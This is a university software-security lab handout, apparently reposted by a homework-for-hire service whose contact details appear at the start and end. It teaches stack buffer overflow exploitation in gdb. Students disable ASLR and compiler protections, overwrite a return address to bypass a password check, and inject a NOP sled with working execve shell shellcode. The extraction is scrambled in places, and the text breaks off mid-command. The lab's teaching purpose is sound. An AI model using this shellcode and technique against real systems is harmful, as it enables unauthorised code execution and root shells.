Monash University – FIT2093
Week 8 Lab
IMPORTANT NOTES:
Software Security Lab
Copyright By PowCoder代写 加微信 powcoder
1. Studylecturematerialsatleast1hourandprepareQuestion1-6underBufferOverflowSectionprior to the lab session. Prepared questions will be discussed in the lab session.
1 Lab Description
The learning objective of this lab is for students to gain first-hand experiences on buffer overflow vulnerability exploitation.
2 Buffer Overflow
This exercise allows you to experiment with a variation of the buffer overflow attacks demonstrated in the lecture. It works with the cloud Ubuntu Linux.
Before we start the lab exercise, first we need to disable the Address Space Layout Randomization (ASLR):
sudo sysctl -w kernel.randomize_va_space=0
Here we first show an example of how to overwrite the returning address of a function call:
1. Copythesourcecode/srv/fit2093files/fit2093lab/auth_overflow2.c1tothehomedirectoryandcom- pile the code, include symbol info. for debugger (-g), disable stack protector (–fno-stack-protector), allow the stack to contain executable code (-z execstack), use 32-bit (-m32), and disable the Position Independent Executables (PIE) (-fno-pie).
cp /srv/fit2093files/fit2093lab/auth_overflow2.c ~
gcc -fno-stack-protector -z execstack -g -m32 -fno-pie -o auth_overflow2 auth_overflow2.c
2. Load the program into the gdb debugger.
gdb auth_overflow2
3. List the program and set break points just before the buffer overflow point and after the overflow.
(gdb) list 1,35
1 #include
2 #include
3 #include
5 int check_authentication(char *password) {
7 char password_buffer[16];
8 int auth_flag[1];
10 auth_flag[0] = 0;
12 strcpy(password_buffer, password);
1Alternatively, you may download from https://cloudstor.aarnet.edu.au/plus/s/vBB59QZQ7WWtAO0 if you are using the local VM. 1
Monash University – FIT2093
Week 8 Lab
20 }
if(strcmp(password_buffer, “brillig”) == 0)
auth_flag[0] = 1;
if(strcmp(password_buffer, “outgrabe”) == 0)
auth_flag[0] = 1;
return auth_flag[0];
33 }
34 }
if(check_authentication(argv[1])) {
printf(“\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n”);
printf(” Access Granted.\n”);
printf(“-=-=-=-=-=-=-=-=-=-=-=-=-=-\n”);
printf(“\nAccess Denied.\n”);
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s
(gdb) break 12
Breakpoint 1 at 0x125e: file auth_overflow2.c, line 12.
(gdb) break 19
Breakpoint 2 at 0x12ae: file auth_overflow2.c, line 19.
4. Runtheprogramwithaninput(payload),whichislargerthanthe16bytesbufferlength(say20“A”characters with ASCII code = 0x41).
(gdb) run $(perl -e ‘print “\x41″x20’)
Starting program: /srv/home/rzha0026/auth_overflow2 $(perl -e ‘print “\x41″x20’)
Breakpoint 1, check_authentication (password=0xffffd4b6 ‘A’
12 strcpy(password_buffer, password);
5. Disassemble the main() function code and locate the return address that execution returns to after the check_authentication function returns.
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x565562b3 <+0>: endbr32
0x565562b7 <+4>:
0x565562bb <+8>:
0x565562be <+11>:
0x565562c1 <+14>:
0x565562c2 <+15>:
0x565562c4 <+17>:
0x565562c5 <+18>:
0x565562c8 <+21>:
0x565562ca <+23>:
0x565562cd <+26>:
0x565562cf <+28>:
0x565562d2 <+31>:
0x565562d4 <+33>:
0x565562d7 <+36>:
lea ecx,[esp+0x4]
and esp,0xfffffff0
push DWORD PTR [ecx-0x4]
push ebp
mov ebp,esp
push ecx
sub esp,0x4
mov eax,ecx
cmp DWORD PTR [eax],0x1
jg 0x565562ef
mov eax,DWORD PTR [eax+0x4]
mov eax,DWORD PTR [eax]
sub esp,0x8
push eax
Monash University – FIT2093
Week 8 Lab
0x565562d8 <+37>:
0x565562dd <+42>:
0x565562e2 <+47>:
0x565562e5 <+50>:
0x565562e8 <+53>:
0x565562ea <+55>:
0x565562ef <+60>:
0x565562f2 <+63>:
0x565562f5 <+66>:
0x565562f7 <+68>:
0x565562fa <+71>:
0x565562fb <+72>:
0x56556300 <+77>:
0x56556303 <+80>:
0x56556305 <+82>:
0x56556307 <+84>:
0x5655630a <+87>:
0x5655630f <+92>:
0x56556314 <+97>:
0x56556317 <+100>:
0x5655631a <+103>:
0x5655631f <+108>:
0x56556324 <+113>:
0x56556327 <+116>:
0x5655632a <+119>:
0x5655632f <+124>:
0x56556334 <+129>:
0x56556337 <+132>:
0x56556339 <+134>:
0x5655633c <+137>:
0x56556341 <+142>:
0x56556346 <+147>:
0x56556349 <+150>:
0x5655634e <+155>:
0x56556351 <+158>: leave
push 0x56557019
call 0xf7e1cde0
sub esp,0xc
push 0x0
call 0xf7e00f80
mov eax,DWORD PTR [eax+0x4]
add eax,0x4
mov eax,DWORD PTR [eax]
sub esp,0xc
push eax
call 0x5655624d
add esp,0x10
test eax,eax
je 0x56556339
sub esp,0xc
push 0x5655702f
call 0xf7e3a290
sub esp,0xc
push 0x5655704c
call 0xf7e3a290
sub esp,0xc
push 0x56557062
call 0xf7e3a290
jmp 0x56556349
sub esp,0xc
push 0x5655707e
call 0xf7e3a290
mov eax,0x0
mov ecx,DWORD PTR [ebp-0x4]
lea esp,[ecx-0x4]
0x56556355 <+162>: ret
End of assembler dump.
Note that in our case, 0x56556300 is the returning address (i.e. the instruction following the call to
check_authentication function). The instructions and addresses may be different in your VM. Examine the contents of the stack memory (starting the at the first byte of the password_buffer): (gdb) x/16xw password_buffer
0x56556352 <+159>:
0xffffd230:
0xffffd240:
0xffffd250:
0xffffd260:
0xf7fb0000
0xf7fb03fc
0xffffd4b6
0xf7fe22d0
0xf7fe22d0
0x00000001
0xffffd314
0xffffd280
0x00000000
0xffffd268
0xffffd320
0x00000000
0xf7e01212
0x56556300
0x56556381
0xf7de7ee5
Can you see the address after the end of the password_buffer in the check_authetntictation() stack frame where the return address is stored? (look for the return address you identified earlier in the stack memory dump).
6. Continue execution to next breakpoint (after the overflow strcpy), and examine the stack memory again. Can you see the overflow bytes containing the ’0x41’ characters? How large should the overflow be to reach and overwrite the return address?
Monash University – FIT2093 Week 8 Lab (gdb) continue
Continuing.
Breakpoint 2, check_authentication (password=0xffffd4b6 ‘A’
19 return auth_flag[0];
(gdb) x/16xw password_buffer
0xffffd230: 0x41414141 0x41414141
0xffffd240: 0x41414141 0x00000000
0xffffd250: 0xffffd4b6 0xffffd314
0xffffd260: 0xf7fe22d0 0xffffd280
7. Generate our attacker “payload” (in little endian) to overwrite the returning address to be the address of “Access Granted”. From the assembly code above, the program will check whether the return value of check_authentication is 0 by test eax,eax instruction. If the return value of check_authentication is 0 (i.e. fail), the program will jump to 0x56556339 by je 0x56556339 instruction. Therefore, from the source code, we know that the address after je 0x56556339 (i.e. 0x56556307) will be the “Access Granted” case.
(gdb) run $(perl -e ‘print “\x07\x63\x55\x56″x20’)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /srv/home/rzha0026/auth_overflow2 $(perl -e ‘print “\x07\x63\x55\x56″x20’)
19 return auth_flag[0];
(gdb) x/16xw password_buffer
0xffffd1f0: 0x56556307 0x56556307
0xffffd200: 0x56556307 0x56556307
0xffffd210: 0x56556307 0x56556307
0xffffd220: 0x56556307 0x56556307
(gdb) continue
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x56556307
0x41414141
0xffffd268
0xffffd320
0x00000000
0x41414141
0x56556300
0x56556381
0xf7de7ee5
Breakpoint 1, check_authentication (
Breakpoint 1, check_authentication (password=0xffffd47a “\acUV\acUV\acUV\acUV\acUV\acUV\acUV\acUV\acUV\acUV\acUV\acUV\ac
12 strcpy(password_buffer, password);
(gdb) x/16xw password_buffer
0xffffd1f0: 0xf7fb0000 0xf7fe22d0
0xffffd200: 0xf7fb03fc 0x00000001
0xffffd210: 0xffffd47a 0xffffd2d4
0xffffd220: 0xf7fe22d0 0xffffd240
(gdb) continue
Continuing.
Breakpoint 2, check_authentication (
password=0x56556307
0x00000000
0xffffd228
0xffffd2e0
0x00000000
0xf7e01212
0x56556300
0x56556381
0xf7de7ee5
Program received signal SIGSEGV, Segmentation fault.
0x56556355 in main (argc=
#include
#include
int check_authentication(char *password) {
char password_buffer[96];
int auth_flag[1];
auth_flag[0] = 0;
strcpy(password_buffer, password);
if(strcmp(password_buffer, “brillig”) == 0)
auth_flag[0] = 1;
if(strcmp(password_buffer, “outgrabe”) == 0)
auth_flag[0] = 1;
return auth_flag[0];
33 }
34 }
if(check_authentication(argv[1])) {
printf(“\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n”);
printf(” Access Granted.\n”);
printf(“-=-=-=-=-=-=-=-=-=-=-=-=-=-\n”);
printf(“\nAccess Denied.\n”);
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s
(gdb) break 12
Breakpoint 1 at 0x125e: file auth_overflow3.c, line 12.
(gdb) break 19
Breakpoint 2 at 0x12ae: file auth_overflow3.c, line 19.
(gdb) run $(perl -e ‘print “\x41″x100’)
Starting program: /srv/home/rzha0026/auth_overflow3 $(perl -e ‘print “\x41″x100’)
Monash University – FIT2093 Week 8 Lab Breakpoint 1, check_authentication (password=0xffffd466 ‘A’
12 strcpy(password_buffer, password);
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x565562b3 <+0>: endbr32
0x565562b7 <+4>:
0x565562bb <+8>:
0x565562be <+11>: push
0x565562c1 <+14>: push
0x565562c2 <+15>: mov
0x565562c4 <+17>: push
0x565562c5 <+18>: sub
0x565562c8 <+21>: mov
0x565562ca <+23>: cmp
0x565562cd <+26>: jg
0x565562cf <+28>: mov
0x565562d2 <+31>: mov
0x565562d4 <+33>: sub
0x565562d7 <+36>: push
0x565562d8 <+37>: push
0x565562dd <+42>: call
0x565562e2 <+47>: add
0x565562e5 <+50>: sub
0x565562e8 <+53>: push
0x565562ea <+55>: call
0x565562ef <+60>: mov
0x565562f2 <+63>: add
0x565562f5 <+66>: mov
0x565562f7 <+68>: sub
0x565562fa <+71>: push
0x565562fb <+72>: call
0x56556300 <+77>: add
0x56556303 <+80>: test
0x56556305 <+82>: je
0x56556307 <+84>: sub
0x5655630a <+87>: push
0x5655630f <+92>: call
0x56556314 <+97>: add
0x56556317 <+100>: sub
0x5655631a <+103>: push
0x5655631f <+108>: call
0x56556324 <+113>: add
0x56556327 <+116>: sub
0x5655632a <+119>: push
0x5655632f <+124>: call
0x56556334 <+129>: add
0x56556337 <+132>: jmp
0x56556339 <+134>: sub
0x5655633c <+137>: push
0x56556341 <+142>: call
0x56556346 <+147>: add
0x56556349 <+150>: mov
0x5655634e <+155>: mov
0x56556351 <+158>: leave
0x56556352 <+159>: lea
0x56556355 <+162>: ret
lea ecx,[esp+0x4]
and esp,0xfffffff0
DWORD PTR [ecx-0x4]
DWORD PTR [eax],0x1
0x565562ef
eax,DWORD PTR [eax+0x4]
eax,DWORD PTR [eax]
0x56557019
0xf7e1cde0
eax,DWORD PTR [eax+0x4]
eax,DWORD PTR [eax]
0x5655624d
0x56556339
0x5655702f
0xf7e3a290
0xf7e3a290
0xf7e3a290
0x5655707e
0xf7e3a290
esp,[ecx-0x4]
Monash University – FIT2093
Week 8 Lab
End of assembler dump.
(gdb) x/48xw password_buffer
0xffffd190:
0xffffd1a0:
0xffffd1b0:
0xffffd1c0:
0xffffd1d0:
0xffffd1e0:
0xffffd1f0:
0xffffd200:
0xffffd210:
0xffffd220:
0xffffd230:
0xffffd240:
(gdb) continue
Continuing.
0xf7ffd000
0x56555034
0x00000000
0x56556110
0xf7faea80
0xf7fb0000
0xf7fb03fc
0xffffd466
0xf7fe22d0
0xf7fb0000
0x00000002
0xf7fb0000
0xffffd218
0x0000000c
0x00000000
0x00000001
0x00080000
0xf7fe22d0
0x00000001
0xffffd2c4
0xffffd230
0xf7fb0000
0xffffd2c4
0xf7ffd000
0x00000002
0xffffd208
0x56555034
0x00001000
0xf7fb0000
0x00000000
0xffffd218
0xffffd2d0
0x00000000
0x00000000
0xffffd2d0
0xffffd2a8
0xf7feb9e9
0xffffd374
0x0000000c
0xffffd2d0
0xf7fb3c68
0xf7e01212
0x56556300
0x56556381
0xf7de7ee5
0xf7de7ee5
0xffffd254
0x00000000
Breakpoint 2, check_authentication (password=0xffffd466 ‘A’
19 return auth_flag[0];
(gdb) x/48xw password_buffer
0xffffd190:
0xffffd1a0:
0xffffd1b0:
0xffffd1c0:
0xffffd1d0:
0xffffd1e0:
0xffffd1f0:
0xffffd200:
0xffffd210:
0xffffd220:
0xffffd230:
0xffffd240:
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0xffffd466
0xf7fe22d0
0xf7fb0000
0x00000002
0xf7fb0000
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x00000000
0xffffd2c4
0xffffd230
0xf7fb0000
0xffffd2c4
0xf7ffd000
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0xffffd218
0xffffd2d0
0x00000000
0x00000000
0xffffd2d0
0xffffd2a8
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x56556300
0x56556381
0xf7de7ee5
0xf7de7ee5
0xffffd254
0x00000000
In the following payload (removing the line breaks), we guess the return address as 0xffffd1a4 (i.e. in the middle of the NOP sled) based on the location of the password_buffer in the above example (we will later revise this guess).
(gdb) run $(perl -e ‘print “\x90″x40,
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”,
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”,
“\xe1\xcd\x80\x90”,
“\xa4\xd1\xff\xff”x40’)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /srv/home/rzha0026/auth_overflow3 $(perl -e ‘print “\x90″x40,”\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd
Breakpoint 1, check_authentication (
password=0xffffd3de ‘\220’
12 strcpy(password_buffer, password);
(gdb) x/48xw password_buffer
0xffffd100:
0xffffd110:
0xffffd120:
0xffffd130:
0xffffd140:
0xffffd150:
0xffffd160:
0xffffd170:
0xf7ffd000
0x56555034
0x00000000
0x56556110
0xf7faea80
0xf7fb0000
0xf7fb03fc
0xffffd3de
0xffffd188
0x0000000c
0x00000000
0x00000001
0x00080000
0xf7fe22d0
0x00000001
0xffffd234
0x00000002
0xffffd178
0x56555034
0x00001000
0xf7fb0000
0x00000000
0xffffd188
0xffffd240
0xf7feb9e9
0xffffd2e4
0x0000000c
0xffffd240
0xf7fb3c68
0xf7e01212
0x56556300
0x56556381
Monash University – FIT2093
Week 8 Lab
0xffffd180: 0xf7fe22d0
0xffffd190: 0xf7fb0000
0xffffd1a0: 0x00000002
0xffffd1b0: 0xf7fb0000
(gdb) continue
Continuing.
0xffffd1a0
0xf7fb0000
0xffffd234
0xf7ffd000
0x00000000
0x00000000
0xffffd240
0xffffd218
0xf7de7ee5
0xf7de7ee5
0xffffd1c4
0x00000000
Breakpoint 2, check_authentication (
password=0xffffd1a4 “\244\321\377\377\244\321\377\377\244\321\377\377\244\321\377\377\244\321\377\377\244\321\377\37
19 return auth_flag[0];
(gdb) x/48xw password_buffer
0xffffd100:
0xffffd110:
0xffffd120:
0xffffd130:
0xffffd140:
0xffffd150:
0xffffd160:
0xffffd170:
0xffffd180:
0xffffd190:
0xffffd1a0:
0xffffd1b0:
0x90909090
0x90909090
0x90909090
0x6a80cda4
0x51e3896e
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0x90909090
0x90909090
0x90909090
0x6851580b
0x8953e289
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0x90909090
0x90909090
0xdb31c031
0x68732f2f
0x9080cde1
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0x90909090
0x90909090
0xb099c931
0x69622f68
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
0xffffd1a4
Our shellcode starts with 0xdb31c031 at the address of the our shellcode is 0xffffd128. Therefore, recon- struct our payload return address to start somewhere before this address – anywhere in the NOP sled will do. We’ll try 0xffffd114 below.
(gdb) run $(perl -e ‘print “\x90″x40,
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”,
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”,
“\xe1\xcd\x80\x90”,
“\x14\xd1\xff\xff”x40’)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /srv/home/rzha0026/auth_overflow3 $(perl -e ‘print “\x90″x40,”\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd
Breakpoint 1, check_authentication (
password=0xffffd3de ‘\220’
12 strcpy(password_b
程序代写 CS代考 加微信: powcoder QQ: 1823890830 Email: powcoder@163.com